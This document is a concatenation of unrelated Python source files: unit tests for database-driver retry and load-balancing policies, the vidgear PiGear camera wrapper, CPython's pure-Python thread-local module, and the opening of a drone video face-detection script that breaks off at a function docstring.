        self.assertEqual(sched_slice[-1], max_delay)

    def test_schedule_with_max(self):
        """A bounded schedule doubles each step until it caps at max_delay."""
        base_delay, max_delay, max_attempts = 2, 100, 64
        policy = ExponentialReconnectionPolicy(base_delay=base_delay, max_delay=max_delay, max_attempts=max_attempts)
        schedule = list(policy.new_schedule())
        self.assertEqual(len(schedule), max_attempts)
        previous = None
        for i, current in enumerate(schedule):
            if i == 0:
                self.assertEqual(current, base_delay)
            elif i < 6:
                # still below the cap: each delay doubles the previous one
                self.assertEqual(current, previous * 2)
            else:
                self.assertEqual(current, max_delay)
            previous = current
# Shorthand used throughout the retry-policy tests below.
ONE = ConsistencyLevel.ONE
class RetryPolicyTest(unittest.TestCase):
    """Tests for the default RetryPolicy decision logic."""

    def test_read_timeout(self):
        """Read timeouts retry only when enough replicas responded but no data came back."""
        policy = RetryPolicy()

        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=1, received_responses=2,
            data_retrieved=True, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # if we didn't get enough responses, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=1,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # if we got enough responses, but also got a data response, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # we got enough responses but no data response, so retry
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=False, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)

    def test_write_timeout(self):
        """Write timeouts retry only for BATCH_LOG writes on the first attempt."""
        policy = RetryPolicy()

        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # if it's not a BATCH_LOG write, don't retry it
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # retry BATCH_LOG writes regardless of received responses
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
            required_responses=10000, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)

    def test_unavailable(self):
        """Unavailable errors retry on the next host for the first attempt only."""
        policy = RetryPolicy()

        # second or greater attempt: rethrow
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # first attempt: try the next host at the same consistency
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY_NEXT_HOST)
        self.assertEqual(consistency, ONE)

        # replica counts don't matter for the next-host retry
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=10000, alive_replicas=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY_NEXT_HOST)
        self.assertEqual(consistency, ONE)
class FallthroughRetryPolicyTest(unittest.TestCase):
    """
    Same scenarios as RetryPolicyTest, but FallthroughRetryPolicy must
    always RETHROW, never retry.
    """

    def test_read_timeout(self):
        policy = FallthroughRetryPolicy()

        # second or greater attempt
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=1, received_responses=2,
            data_retrieved=True, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # not enough responses
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=1,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # enough responses with data
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # enough responses without data — even this case must rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=False, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

    def test_write_timeout(self):
        policy = FallthroughRetryPolicy()

        # second or greater attempt
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # simple write, first attempt
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # even BATCH_LOG writes (which the default policy retries) rethrow
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
            required_responses=10000, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

    def test_unavailable(self):
        policy = FallthroughRetryPolicy()

        # second or greater attempt
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # first attempt — still rethrows
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=1, alive_replicas=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # not enough replicas — still rethrows
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE,
            required_replicas=10000, alive_replicas=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)
class DowngradingConsistencyRetryPolicyTest(unittest.TestCase):
    """Tests for DowngradingConsistencyRetryPolicy's consistency-lowering retries."""

    def test_read_timeout(self):
        policy = DowngradingConsistencyRetryPolicy()

        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=1, received_responses=2,
            data_retrieved=True, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # if we didn't get enough responses, retry at a lower consistency
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=4, received_responses=3,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.THREE)

        # if we didn't get enough responses, retry at a lower consistency
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.TWO)

        # retry consistency level goes down based on the # of recv'd responses
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=1,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.ONE)

        # if we got no responses, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=0,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # if we got enough response but no data, retry
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=3, received_responses=3,
            data_retrieved=False, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)

        # if we got enough responses, but also got a data response, rethrow
        retry, consistency = policy.on_read_timeout(
            query=None, consistency=ONE, required_responses=2, received_responses=2,
            data_retrieved=True, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

    def test_write_timeout(self):
        policy = DowngradingConsistencyRetryPolicy()

        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.SIMPLE,
            required_responses=1, received_responses=2, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        for write_type in (WriteType.SIMPLE, WriteType.BATCH, WriteType.COUNTER):
            # ignore failures if at least one response (replica persisted)
            retry, consistency = policy.on_write_timeout(
                query=None, consistency=ONE, write_type=write_type,
                required_responses=1, received_responses=2, retry_num=0)
            self.assertEqual(retry, RetryPolicy.IGNORE)
            # rethrow if we can't be sure we have a replica
            retry, consistency = policy.on_write_timeout(
                query=None, consistency=ONE, write_type=write_type,
                required_responses=1, received_responses=0, retry_num=0)
            self.assertEqual(retry, RetryPolicy.RETHROW)

        # downgrade consistency level on unlogged batch writes
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.UNLOGGED_BATCH,
            required_responses=3, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.ONE)

        # retry batch log writes at the same consistency level
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
            required_responses=3, received_responses=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ONE)

        # timeout on an unknown write_type
        retry, consistency = policy.on_write_timeout(
            query=None, consistency=ONE, write_type=None,
            required_responses=1, received_responses=2, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

    def test_unavailable(self):
        policy = DowngradingConsistencyRetryPolicy()

        # if this is the second or greater attempt, rethrow
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=1)
        self.assertEqual(retry, RetryPolicy.RETHROW)
        self.assertEqual(consistency, None)

        # downgrade consistency on unavailable exceptions
        retry, consistency = policy.on_unavailable(
            query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=0)
        self.assertEqual(retry, RetryPolicy.RETRY)
        self.assertEqual(consistency, ConsistencyLevel.ONE)
class WhiteListRoundRobinPolicyTest(unittest.TestCase):
    def test_hosts_with_hostname(self):
        """A whitelist entry given as a hostname must match hosts by resolved IP."""
        policy = WhiteListRoundRobinPolicy(['localhost'])
        host = Host("127.0.0.1", SimpleConvictionPolicy)
        policy.populate(None, [host])

        self.assertEqual(sorted(policy.make_query_plan()), [host])
        self.assertEqual(policy.distance(host), HostDistance.LOCAL)
|
pigear.py | """
===============================================
vidgear library source-code is deployed under the Apache 2.0 License:
Copyright (c) 2019 Abhishek Thakur(@abhiTronix) <abhi.una12@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================
"""
# import the packages
from threading import Thread
from pkg_resources import parse_version
import sys, time
from .helper import capPropId
try:
    # import OpenCV Binaries
    import cv2
except ImportError as error:
    # OpenCV itself is missing from the environment.
    raise ImportError('[ERROR]: Failed to detect OpenCV executables, install it with `pip3 install opencv-python` command.')

# check whether OpenCV Binaries are 3.x+.
# BUG FIX: this check used to live inside the try block above, so its
# ImportError was caught and masked by the misleading "failed to detect
# OpenCV executables" message; raise it outside the handler instead.
if parse_version(cv2.__version__) < parse_version('3'):
    raise ImportError('[ERROR]: OpenCV library version >= 3.0 is only supported by this library')
class PiGear:
"""
PiGear is similar to CamGear but exclusively made to support various Raspberry Pi Camera Modules
(such as OmniVision OV5647 Camera Module and Sony IMX219 Camera Module). To interface with these
modules correctly, PiGear provides a flexible multi-threaded wrapper around complete picamera
python library and provides us the ability to exploit its various features like `brightness, saturation, sensor_mode`, etc. effortlessly.
:param (tuple) resolution: sets the resolution (width,height). Its default value is (640,480).
:param (integer) framerate: sets the framerate. Its default value is 25.
:param (string) colorspace: set colorspace of the video stream. Its default value is None.
:param (dict) **options: sets parameter supported by PiCamera Class to the input video stream.
/ These attribute provides the flexibility to manipulate input raspicam video stream directly.
/ Parameters can be passed using this **option, allows you to pass key worded variable length of arguments to PiGear Class.
:param (boolean) logging: set this flag to enable/disable error logging essential for debugging. Its default value is False.
:param (integer) time_delay: sets time delay(in seconds) before start reading the frames.
/ This delay is essentially required for camera to warm-up.
/ Its default value is 0.
"""
def __init__(self, camera_num = 0, resolution = (640, 480), framerate = 30, colorspace = None, logging = False, time_delay = 0, **options):
    """
    Initialize the PiGear stream.

    :param (int) camera_num: index of the Pi camera module to use. Default 0.
    :param (tuple) resolution: (width, height) of the stream. Default (640, 480).
    :param (int/float) framerate: capture framerate; must be > 5. Default 30.
    :param (string) colorspace: target colorspace name passed to capPropId
        (applied via cv2.cvtColor), or None for raw BGR. Default None.
    :param (boolean) logging: enables debug logging. Default False.
    :param (int) time_delay: camera warm-up delay in seconds. Default 0.
    :param (dict) **options: extra PiCamera attributes, plus the special
        `HWFAILURE_TIMEOUT` parameter (a float strictly between 1.0 and 10.0).
    :raises ImportError: if picamera is not installed.
    :raises RuntimeError: on picamera API failure or if no frame can be grabbed.
    """
    try:
        import picamera
        from picamera.array import PiRGBArray
        from picamera import PiCamera
    except Exception as error:
        if isinstance(error, ImportError):
            # Output expected ImportErrors.
            raise ImportError('[ERROR]: Failed to detect Picamera executables, install it with "pip3 install picamera" command.')
        else:
            # Handle any API errors
            raise RuntimeError('[ERROR]: Picamera API failure: {}'.format(error))

    # validate user inputs
    assert (isinstance(framerate, (int, float)) and framerate > 5.0), "[ERROR]: Input framerate value `{}` is a Invalid! Kindly read docs.".format(framerate)
    assert (isinstance(resolution, (tuple, list)) and len(resolution) == 2), "[ERROR]: Input resolution value `{}` is a Invalid! Kindly read docs.".format(resolution)
    # NOTE(review): an invalid camera_num is only reported, not rejected;
    # PiCamera() below will raise on its own if the index is unusable.
    if not (isinstance(camera_num, int) and camera_num >= 0):
        print("[ERROR]: `camera_num` value is invalid, Kindly read docs!")

    # initialize the picamera stream at given index
    self.camera = PiCamera(camera_num = camera_num)
    self.camera.resolution = tuple(resolution)
    self.camera.framerate = framerate
    if logging:
        print("[LOG]: Activating Pi camera at index: {} with resolution: {} & framerate: {}".format(camera_num, resolution, framerate))

    # initialize framerate variable
    self.framerate = framerate
    # initializing colorspace variable (resolved below if `colorspace` given)
    self.color_space = None

    # reformat options dict (strip stray whitespace from keys)
    options = {k.strip(): v for k, v in options.items()}

    # define timeout variable default value (handles hardware failures)
    self.failure_timeout = 2.0
    # User-Defined parameter
    if options and "HWFAILURE_TIMEOUT" in options:
        # for altering timeout variable manually
        if isinstance(options["HWFAILURE_TIMEOUT"], (int, float)):
            if not (10.0 > options["HWFAILURE_TIMEOUT"] > 1.0):
                raise ValueError('[ERROR]: `HWFAILURE_TIMEOUT` value can only be between 1.0 ~ 10.0')
            self.failure_timeout = options["HWFAILURE_TIMEOUT"]  # assign special parameter
            if logging:
                print("[LOG]: Setting HW Failure Timeout: {} seconds".format(self.failure_timeout))
        del options["HWFAILURE_TIMEOUT"]  # clean
    try:
        # apply attributes to source if specified
        for key, value in options.items():
            setattr(self.camera, key, value)
        # separately handle colorspace value to int conversion
        if not (colorspace is None):
            self.color_space = capPropId(colorspace.strip())
            if logging:
                print('[LOG]: Enabling `{}` colorspace for this video stream!'.format(colorspace.strip()))
    except Exception as e:
        # Catch if any error occurred
        if logging:
            print(e)

    # enable rgb capture array thread and capture stream
    self.rawCapture = PiRGBArray(self.camera, size = resolution)
    self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port=True)

    # frame variable initialization
    self.frame = None
    try:
        # grab an initial frame to confirm the camera module works
        stream = next(self.stream)
        self.frame = stream.array
        self.rawCapture.seek(0)
        self.rawCapture.truncate()
        # render colorspace if defined
        # BUG FIX: the old test `not (frame is None and color_space is None)`
        # also fired when no colorspace was requested, passing None as the
        # conversion code to cv2.cvtColor and crashing in the default
        # configuration; convert only when BOTH frame and colorspace exist.
        if self.frame is not None and self.color_space is not None:
            self.frame = cv2.cvtColor(self.frame, self.color_space)
    except Exception as e:
        print(e)
        raise RuntimeError('[ERROR]: Camera Module failed to initialize!')

    # applying time delay to warm-up picamera only if specified
    if time_delay:
        time.sleep(time_delay)

    # thread initialization
    self.thread = None
    # timer thread initialization (keeps check on frozen thread)
    self._timer = None
    self.t_elasped = 0.0  # records time taken by thread (name kept for compatibility)
    # enable logging if specified
    self.logging = logging
    # catching thread exceptions
    self.exceptions = None
    # initialize termination flag
    self.terminate = False
def start(self):
    """
    Launch the frame-producer thread together with the internal watchdog
    timer thread, then return this instance for call chaining.
    """
    # both workers are daemons so they never block interpreter exit;
    # the producer is fully started before the watchdog begins timing it
    for attr_name, target in (("thread", self.update), ("_timer", self._timeit)):
        worker = Thread(target=target, args=())
        worker.daemon = True
        setattr(self, attr_name, worker)
        worker.start()
    return self
def _timeit(self):
    """
    Watchdog loop: flags a hardware failure when the producer thread stops
    refreshing `self.t_elasped` within `self.failure_timeout` seconds.
    """
    # start the clock from now
    self.t_elasped = time.time()
    while True:
        if self.terminate:
            break
        idle_for = time.time() - self.t_elasped
        if idle_for > self.failure_timeout:
            # producer looks frozen: report, mark the boolean failure
            # sentinel for read(), and self-terminate
            if self.logging:
                print("[WARNING]: Camera Module Disconnected!")
            self.exceptions = True
            self.terminate = True
def update(self):
    """
    Producer loop: pull frames from the picamera generator, refresh the
    watchdog timestamp, optionally convert colorspace, and publish the
    latest frame to `self.frame`.  Releases camera resources on exit.
    """
    # keep looping infinitely until the thread is terminated
    while True:
        # check for termination flag
        if self.terminate:
            break
        try:
            # Try to iterate next frame from generator
            stream = next(self.stream)
        except Exception:
            # catch and save any exceptions for read() to re-raise
            self.exceptions = sys.exc_info()
            break  # exit
        # update timer so the watchdog knows we are alive
        self.t_elasped = time.time()
        # grab the frame from the stream and clear the stream in
        # preparation for the next frame
        frame = stream.array
        self.rawCapture.seek(0)
        self.rawCapture.truncate()
        # apply colorspace if specified
        if not (self.color_space is None):
            color_frame = None
            try:
                if isinstance(self.color_space, int):
                    color_frame = cv2.cvtColor(frame, self.color_space)
                else:
                    # BUGFIX: log the offending value *before* clearing it;
                    # the original reset color_space first and always
                    # logged `None` instead of the invalid value.
                    if self.logging:
                        print('[LOG]: Colorspace value `{}` is not a valid colorspace!'.format(self.color_space))
                    self.color_space = None
            except Exception as e:
                # Catch if any error occurred during conversion
                self.color_space = None
                if self.logging:
                    print(e)
                    print('[WARNING]: Input colorspace is not a valid Colorspace!')
            if not (color_frame is None):
                self.frame = color_frame
            else:
                self.frame = frame
        else:
            self.frame = frame
    # terminate processes
    if not (self.terminate):
        self.terminate = True
    # release picamera resources
    self.stream.close()
    self.rawCapture.close()
    self.camera.close()
def read(self):
    """
    Return the most recent frame, or re-raise any failure recorded by the
    producer/watchdog threads.

    :raises SystemError: when the watchdog flagged a hardware failure
    :raises RuntimeError: when the producer caught a picamera API error
    """
    # fast path: no failure recorded, hand back whatever we have
    if self.exceptions is None:
        return self.frame
    # a failure was recorded: drop the stale frame before reporting
    self.frame = None
    if isinstance(self.exceptions, bool):
        # boolean sentinel set by the watchdog (_timeit)
        raise SystemError('[ERROR]: Hardware failure occurred, Kindly reconnect Camera Module and restart your Pi!')
    # producer stored sys.exc_info(); re-raise with the original traceback
    error_msg = "[ERROR]: Camera Module API failure occured: {}".format(self.exceptions[1])
    raise RuntimeError(error_msg).with_traceback(self.exceptions[2])
def stop(self):
    """
    Terminate the watchdog and producer threads and release all camera
    resources.  Safe to call whether or not start() succeeded.
    """
    if self.logging:
        print("[LOG]: Terminating PiGear Process.")
    # make sure that the threads should be terminated
    self.terminate = True
    # stop timer thread
    if not (self._timer is None):
        self._timer.join()
    # handle camera thread
    if not (self.thread is None):
        # check if hardware failure occured
        if not (self.exceptions is None) and isinstance(self.exceptions, bool):
            # the producer may be blocked inside next(self.stream);
            # force-release picamera resources so it can unblock
            self.stream.close()
            self.rawCapture.close()
            self.camera.close()
            # BUGFIX: threading.Thread has no terminate()/wait() methods —
            # the original raised AttributeError here; join() is the
            # correct way to wait for the thread to finish
            self.thread.join()
            self.thread = None
        else:
            # properly handle thread exit
            self.thread.join()
_threading_local.py | from threading import current_thread, RLock
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... def __init__(self, **kw):
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red')], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
    """A class managing thread-local dicts"""
    # 'key' is the attribute name planted on each Thread's __dict__;
    # 'dicts' maps id(Thread) -> (weakref(Thread), that thread's dict);
    # 'localargs' and 'locallock' are filled in by local.__new__.
    __slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'

    def __init__(self):
        # The key used in the Thread objects' attribute dicts.
        # We keep it a string for speed but make it unlikely to clash with
        # a "real" attribute.
        self.key = '_threading_local._localimpl.' + str(id(self))
        # { id(Thread) -> (ref(Thread), thread-local dict) }
        self.dicts = {}

    def get_dict(self):
        """Return the dict for the current thread. Raises KeyError if none
        defined."""
        thread = current_thread()
        return self.dicts[id(thread)][1]

    def create_dict(self):
        """Create a new dict for the current thread, and return it."""
        localdict = {}
        key = self.key
        thread = current_thread()
        idt = id(thread)

        def local_deleted(_, key=key):
            # When the localimpl is deleted, remove the thread attribute.
            thread = wrthread()
            if thread is not None:
                del thread.__dict__[key]

        def thread_deleted(_, idt=idt):
            # When the thread is deleted, remove the local dict.
            # Note that this is suboptimal if the thread object gets
            # caught in a reference loop. We would like to be called
            # as soon as the OS-level thread ends instead.
            local = wrlocal()
            if local is not None:
                dct = local.dicts.pop(idt)

        # Two-way cleanup: whichever of (impl, thread) dies first removes
        # the matching entry from the survivor via the callbacks above.
        wrlocal = ref(self, local_deleted)
        wrthread = ref(thread, thread_deleted)
        thread.__dict__[key] = wrlocal
        self.dicts[idt] = wrthread, localdict
        return localdict
@contextmanager
def _patch(self):
    # Swap the calling thread's private dict into `self.__dict__` for the
    # duration of a single attribute access on a `local` instance.
    impl = object.__getattribute__(self, '_local__impl')
    try:
        dct = impl.get_dict()
    except KeyError:
        # First access from this thread: build the dict, then re-run the
        # subclass __init__ with the originally supplied args so each
        # thread gets its own initialized state.
        dct = impl.create_dict()
        args, kw = impl.localargs
        self.__init__(*args, **kw)
    # The RLock serializes the __dict__ swap across threads.
    with impl.locallock:
        object.__setattr__(self, '__dict__', dct)
        yield
class local:
    """Thread-local data container; each thread sees its own attribute set."""
    __slots__ = '_local__impl', '__dict__'

    def __new__(cls, *args, **kw):
        # Constructor args are only meaningful if a subclass overrides
        # __init__ (it is re-invoked per thread by _patch).
        if (args or kw) and (cls.__init__ is object.__init__):
            raise TypeError("Initialization arguments are not supported")
        self = object.__new__(cls)
        impl = _localimpl()
        impl.localargs = (args, kw)
        impl.locallock = RLock()
        object.__setattr__(self, '_local__impl', impl)
        # We need to create the thread dict in anticipation of
        # __init__ being called, to make sure we don't call it
        # again ourselves.
        impl.create_dict()
        return self

    def __getattribute__(self, name):
        # Every lookup goes through _patch so __dict__ is the current
        # thread's dict while the access happens.
        with _patch(self):
            return object.__getattribute__(self, name)

    def __setattr__(self, name, value):
        # __dict__ itself is managed by _patch and must not be rebound
        if name == '__dict__':
            raise AttributeError(
                "%r object attribute '__dict__' is read-only"
                % self.__class__.__name__)
        with _patch(self):
            return object.__setattr__(self, name, value)

    def __delattr__(self, name):
        if name == '__dict__':
            raise AttributeError(
                "%r object attribute '__dict__' is read-only"
                % self.__class__.__name__)
        with _patch(self):
            return object.__delattr__(self, name)
|
test_video.py | import socket
import threading
import time
import pickle
import cv2
from Detection.MtcnnDetector import MtcnnDetector
from Detection.detector import Detector
from Detection.fcn_detector import FcnDetector
from train_models.mtcnn_model import P_Net, R_Net, O_Net
import visualization_utils
# MTCNN cascade configuration: per-stage detection thresholds, minimum
# detectable face size (px) and sliding-window stride.
thresh = [0.7, 0.1, 0.1]
min_face_size = 24
stride = 2
slide_window = True
shuffle = False
# [PNet, RNet, ONet] detector slots, filled below.
detectors = [None, None, None]
prefix = ['data/MTCNN_model/PNet_landmark/PNet', 'data/MTCNN_model/RNet_landmark/RNet', 'data/MTCNN_model/ONet_landmark/ONet']
# checkpoint epochs to load for each stage; combined into '<prefix>-<epoch>' paths
epoch = [18, 14, 16]
model_path = ['%s-%s' % (x, y) for x, y in zip(prefix, epoch)]
# PNet is fully convolutional; RNet/ONet are built with sizes 24 and 48 and
# batch size 1 (presumably fixed crop sizes — confirm in Detection.detector).
PNet = FcnDetector(P_Net, model_path[0])
detectors[0] = PNet
RNet = Detector(R_Net, 24, 1, model_path[1])
detectors[1] = RNet
ONet = Detector(O_Net, 48, 1, model_path[2])
detectors[2] = ONet
mtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=min_face_size, stride=stride, threshold=thresh, slide_window=slide_window)
# in cm, etc, assumed same width during flight
initial_flight_height = 20
# focal length = (P * D) / W
# assume D = W
focal_length = initial_flight_height * 10
def midpoint(x, y):
    """Return the point halfway between 2-D points *x* and *y* as a tuple."""
    mid_x = (x[0] + y[0]) * 0.5
    mid_y = (x[1] + y[1]) * 0.5
    return (mid_x, mid_y)
def distance_to_camera(initial_width, focal_length, virtual_width):
    """
    Estimate object distance via triangle similarity: D = (W * F) / P,
    where W is the known real width, F the calibrated focal length and
    P (`virtual_width`) the perceived width in pixels.
    """
    # BUGFIX: the original referenced the undefined name `focalLength`,
    # raising NameError on every call; use the `focal_length` parameter.
    return (initial_width * focal_length) / virtual_width
# H.264 start-code header prepended to each assembled clip so OpenCV can
# decode it stand-alone (looks like SPS/PPS NAL units, 0x67/0x68 — confirm).
header = b'\x00\x00\x00\x01gM@(\x95\xa0<\x05\xb9\x00\x00\x00\x01h\xee8\x80'
# buffer of raw H.264 payloads filled by receive_video()
h264 = []
# command (drone control) and video-stream UDP sockets
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock_video = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock_video.bind(('192.168.10.3', 6038))
def receive_video():
    """Collect raw H.264 payloads from the drone's video socket into `h264`."""
    global h264
    while True:
        packet, _addr = sock_video.recvfrom(2048)
        payload = packet[2:]  # strip the 2-byte packet header
        # payload lengths 8 and 13 appear to be control/keep-alive sized
        # packets and are skipped
        if len(payload) not in (8, 13):
            h264.append(payload)
def run_cam():
    """
    Continuously assemble buffered H.264 payloads into a playable clip,
    run MTCNN face detection on the decoded frames and display them with
    estimated face distance and FPS overlays.
    """
